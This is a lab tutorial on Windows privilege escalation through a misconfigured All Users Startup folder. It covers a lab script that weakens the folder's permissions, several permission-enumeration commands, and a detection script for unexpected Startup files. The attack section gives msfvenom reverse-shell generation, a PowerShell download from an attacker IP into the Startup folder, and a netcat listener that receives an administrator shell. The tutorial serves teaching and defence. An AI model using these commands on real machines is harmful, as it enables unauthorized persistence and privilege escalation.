Privilege Escalation

Windows Privilege Escalation: Boot or Logon Autostart Execution (Startup Folder)

The Windows Startup folder can be abused by an attacker for persistence or privilege escalation. Adding an application to a Startup folder, or referencing it from a Registry Run key, are the two ways to do this: when a user signs in, every item listed in the Registry "Run" keys or placed in a Startup folder is executed. These programs run in the context of the user who logs on and inherit that account's permission level.

Logon Autostart Execution can be performed in two ways:

Logon Autostart Execution: Registry Run Keys

Logon Autostart Execution: Startup Folder

Table of Contents

Windows Startup Folder

Boot or Logon Autostart Execution (MITRE ATT&CK)

Prerequisite

Lab Setup

Privilege Escalation by Abusing Startup Folder

  • Enumerating Assigned Permissions with icacls
  • Enumerating Assigned Permissions with accesschk.exe
  • Creating Malicious Executable

Windows Startup Folder

The Startup folder is a folder reachable from the Start Menu. Programs (or shortcuts to programs) placed in it are launched automatically when a user logs on. There are two Startup folder locations in Windows.

  • System level: the All Users Startup folder, whose contents run for every account that logs on.

The All Users Startup folder is found in the following path:

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  • Run dialog box (Windows Key + R): type shell:common startup

  • User level: each user has a personal Startup folder whose contents run only when that user logs on.

The Current User Startup folder is located here:

  • C:\Users\<User_Name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Run dialog box (Windows Key + R): type shell:startup

Boot or Logon Autostart Execution: Startup Folder

Placing a malicious program in a Startup folder causes it to execute each time a user logs on. A Startup folder with weak permissions therefore gives an attacker persistence, and privilege escalation when a more privileged user is the next to log on.

This is one of the most common persistence methods and is attributed by MITRE to well-known groups such as APT3, APT33 and APT39.

MITRE ID: T1547.001

Tactics: Persistence, Privilege Escalation

Platforms: Windows

Prerequisite

Target Machine: Windows 10

Attacker Machine: Kali Linux

Tools: AccessChk.exe

Condition: the target machine has already been compromised with low-privileged access (using Metasploit, Netcat, etc.).

Objective: escalate privileges from a low-privileged user by exploiting the misconfigured All Users Startup folder. The dropped payload runs with the rights of whichever account logs on next, so the escalation pays off when an administrator signs in.

Lab Setup

Note: the following steps deliberately create a loophole by misconfiguring the Startup folder; avoid such a configuration in a production environment.

Step 1: Navigate to the All Users Startup directory using the following path:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Step 2: Open the Startup folder's Properties and select the Security tab. Click Edit to change the permissions assigned to the Users group.

Step 3: Select the Users group and grant it Modify (read and write) or Full Control permissions. Either one lets any local user create files in the folder, which is the misconfiguration abused below.
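The same misconfiguration can be applied (and, more importantly, undone) from a script instead of the Properties dialog. The following PowerShell function is an added example and not part of the original post: it adds an explicit Modify ACE for BUILTIN\Users on the All Users Startup folder with the same inheritance flags the GUI uses, and the -Revert switch removes exactly that ACE again. The function name and parameter names are my own; run it from an elevated prompt on the lab VM only.

```powershell
# Added example (not from the original post): reproduce the lab misconfiguration
# from a script instead of the Properties > Security dialog, and undo it afterwards.
# Run from an elevated PowerShell prompt on the target VM only.
$StartupAllUsers = 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'

function Set-StartupFolderWeakAcl {
    param(
        [string]$Path = $StartupAllUsers,
        [string]$Identity = 'BUILTIN\Users',
        # Modify is enough for the attack: create, write and delete on the folder and its children.
        [System.Security.AccessControl.FileSystemRights]$Rights = 'Modify',
        [switch]$Revert
    )
    $acl = Get-Acl -Path $Path
    # (OI)(CI): the ACE applies to the folder, its files and its subfolders,
    # which is what the GUI does when a right is ticked on the folder itself.
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        $Identity,
        $Rights,
        ([System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'),
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AccessControlType]::Allow)
    if ($Revert) {
        # Removes only the explicit ACE added below; inherited read/execute ACEs stay untouched.
        [void]$acl.RemoveAccessRule($rule)
    } else {
        $acl.AddAccessRule($rule)
    }
    Set-Acl -Path $Path -AclObject $acl
    # Show the resulting explicit (non-inherited) entries so the change is visible.
    (Get-Acl -Path $Path).Access |
        Where-Object { -not $_.IsInherited } |
        Select-Object IdentityReference, FileSystemRights, AccessControlType
}

# Create the loophole (lab only):
Set-StartupFolderWeakAcl
# Undo it when the lab is finished:
# Set-StartupFolderWeakAcl -Revert
```

After the call, the explicit entry for BUILTIN\Users with Modify rights appears in the output; after -Revert it is gone and only the inherited default entries remain, which is the state a production host should be in.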

Privilege Escalation by Abusing Startup Folder

Enumerating Assigned Permissions with icacls

Attackers abuse these autostart locations to launch malware, such as a RAT, that survives reboots and logons.

After gaining an initial foothold, we can list the folder's permissions with the following command. What we are looking for is a write-capable right, shown by icacls as (M), (W) or (F), granted to a group the current user belongs to, such as BUILTIN\Users, Everyone or Authenticated Users:

icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Enumerating Assigned Permissions with accesschk.exe

accesschk.exe, from the Sysinternals suite, is another permission checker and can be used the same way:

accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Here the output shows RW (read and write) access for BUILTIN\Users, confirming the misconfiguration.
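The icacls and accesschk output above is read by hand; the following PowerShell, which is an added example and not code from the original post, answers the same question programmatically for both Startup folders using only Get-Acl, so it can be run from a low-privileged foothold without uploading Sysinternals tools. It skips Deny entries and inherit-only ACEs (which do not apply to the folder itself) and reads the raw access mask so that generic rights, which the FileSystemRights enum has no names for, are not missed. The function name and the list of low-privileged principals are my own choices.

```powershell
# Added example (not from the original post): report ACEs on both Startup folders that
# let a low-privileged principal create or overwrite a file there.
$StartupFolders = @(
    'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp',
    (Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup')
)

# Principals every interactive, non-admin user is a member of, plus the caller itself.
$LowPrivPrincipals = @(
    'BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME"
)

# Bits that allow creating or overwriting a file inside a directory.
$CreateFiles  = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles   # 0x2
$GenericWrite = 0x40000000   # GENERIC_WRITE, appears on some inherited ACEs
$GenericAll   = 0x10000000   # GENERIC_ALL

function Get-WritableStartupFolder {
    foreach ($folder in $StartupFolders) {
        if (-not (Test-Path -LiteralPath $folder)) { continue }
        $acl = Get-Acl -LiteralPath $folder
        foreach ($ace in $acl.Access) {
            # Inherit-only ACEs apply to children, not to the folder itself.
            if ($ace.PropagationFlags.HasFlag([System.Security.AccessControl.PropagationFlags]::InheritOnly)) { continue }
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # Work on the raw 32-bit mask so undefined (generic) bits survive the enum cast.
            $raw = [long]([int]$ace.FileSystemRights) -band 0xFFFFFFFFL
            $canWrite = (($raw -band $CreateFiles)  -ne 0) -or
                        (($raw -band $GenericWrite) -ne 0) -or
                        (($raw -band $GenericAll)   -ne 0)
            if ($canWrite) {
                [pscustomobject]@{
                    Folder    = $folder
                    Identity  = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

Get-WritableStartupFolder | Format-Table -AutoSize
```

Your own profile's Startup folder will always be listed as writable by you; that is normal and only buys persistence at your current privilege level. The finding that matters is a row for the All Users folder under C:\ProgramData granted to BUILTIN\Users, Everyone or Authenticated Users, which is what the lab setup above creates.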

Creating Malicious Executable

Since the current user has write access to the All Users Startup folder, we can drop a payload there for persistence or privilege escalation. Create an executable with msfvenom and serve it over HTTP from the attacker machine (python3 -m http.server 80 is the equivalent on current Kali releases):

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > shell.exe
python -m SimpleHTTPServer 80

Executing Malicious Executable

Start a netcat listener on port 8888 (the lport given to msfvenom) in a new terminal, then, from the foothold shell on the target, download shell.exe directly into the Startup folder:

cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
powershell wget 192.168.1.3/shell.exe -o shell.exe
dir

The technique is called Boot or Logon Autostart Execution for a reason: shell.exe does not run when it is dropped, but the next time a user logs on, for example after the machine reboots.

When that happens the attacker receives a reverse connection in the netcat session running as the account that logged on. Because Startup folder items run with the token of the user who signs in, the shell carries that user's privileges: in this lab the next logon is an administrator, so the shell is administrative (subject to UAC token filtering if UAC is enabled), and a further step is needed to go from there to NT AUTHORITY\SYSTEM. A standard user logging on instead would only hand the attacker another low-privileged shell.
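From the defender's side the artefact this leaves behind is a loose executable in a Startup folder. The following PowerShell function is an added example, not code from the original post: it sweeps the All Users Startup folder and every profile's Startup folder under C:\Users, reports anything that is not a shortcut or desktop.ini, and records creation time, SHA-256 and Authenticode status for triage. The function name and the list of expected file types are my own; run it elevated so other users' profiles are readable.

```powershell
# Added example (not from the original post): inventory every Startup folder on the host
# and surface files that do not belong there, such as the shell.exe dropped above.
function Get-StartupFolderPayload {
    param(
        # File types normally present in Startup folders; everything else is reported.
        [string[]]$Expected = @('.lnk', '.ini', '.url')
    )
    $folders = @('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp')
    # One per-user Startup folder per profile directory (the path is only a candidate
    # until Test-Path confirms the profile has created it).
    $folders += Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' }

    foreach ($folder in $folders) {
        if (-not (Test-Path -LiteralPath $folder)) { continue }
        # -Force includes hidden files such as desktop.ini so nothing is skipped silently.
        Get-ChildItem -LiteralPath $folder -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $Expected -notcontains $_.Extension } |
            ForEach-Object {
                [pscustomobject]@{
                    Path    = $_.FullName
                    Created = $_.CreationTimeUtc
                    Size    = $_.Length
                    SHA256  = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
                    # Unsigned binaries in a Startup folder deserve a closer look.
                    Signed  = (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status
                }
            }
    }
}

Get-StartupFolderPayload | Format-List
```

Run on the lab machine after the steps above, this lists shell.exe in the All Users folder with Signed = NotSigned and a creation time that matches the download. For continuous coverage rather than a one-off sweep, file-creation telemetry scoped to these two paths (for example Sysmon Event ID 11) catches the drop at the moment it happens instead of at the next logon.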

Reference: https://attack.mitre.org/techniques/T1547/001/

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, a social media lover and a gadgets enthusiast.